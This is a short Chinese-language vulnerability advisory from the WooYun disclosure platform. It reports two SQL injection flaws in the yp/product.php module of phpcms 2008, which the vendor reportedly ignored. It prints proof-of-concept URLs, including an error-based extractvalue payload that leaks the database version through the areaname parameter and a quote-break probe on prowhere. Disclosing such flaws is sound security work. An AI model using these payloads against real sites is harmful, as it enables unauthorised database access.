漏洞标题： phpcms 2008 SQL注射漏洞2枚 相关厂商： phpcms漏洞作者： c4rp3nt3r 提交时间： 2012-05-09公开时间： 2012-05-14漏洞类型： SQL注射漏洞危害等级： 低自评Rank： 2漏洞状态： 漏洞已经通知厂商但是厂商忽略漏洞 漏洞来源： http://www.wooyun.orgTags标签： 第三方不可信程序 phpcms 注射利用技巧 sql注射利用技巧 分享漏洞： 腾讯微博 新浪微博 Twitter 网易微博 豆瓣 
--------------------------------------------------------------------------------

漏洞详情披露状态：2012-05-09： 细节已通知厂商并且等待厂商处理中
2012-05-14： 厂商已经主动忽略漏洞，细节向公众公开

简要描述：phpcms 2008某模块,参数缺少过滤存在SQL注射漏洞2个.也没什么危害1个1rank不多吧?
详细说明：跟这个存在的位置差不多好像,当时找的.
http://www.wooyun.org/bugs/wooyun-2010-02984


http://bt/phpcms2008/phpcms/yp/product.php?catid=1&areaname=555%27%20and%20extractvalue%281,concat%280x09,%28version%28%29%29%29%29%20and%20%271%27=%271


http://127.0.0.1/v/phpcms/yp/product.php?prowhere=1%27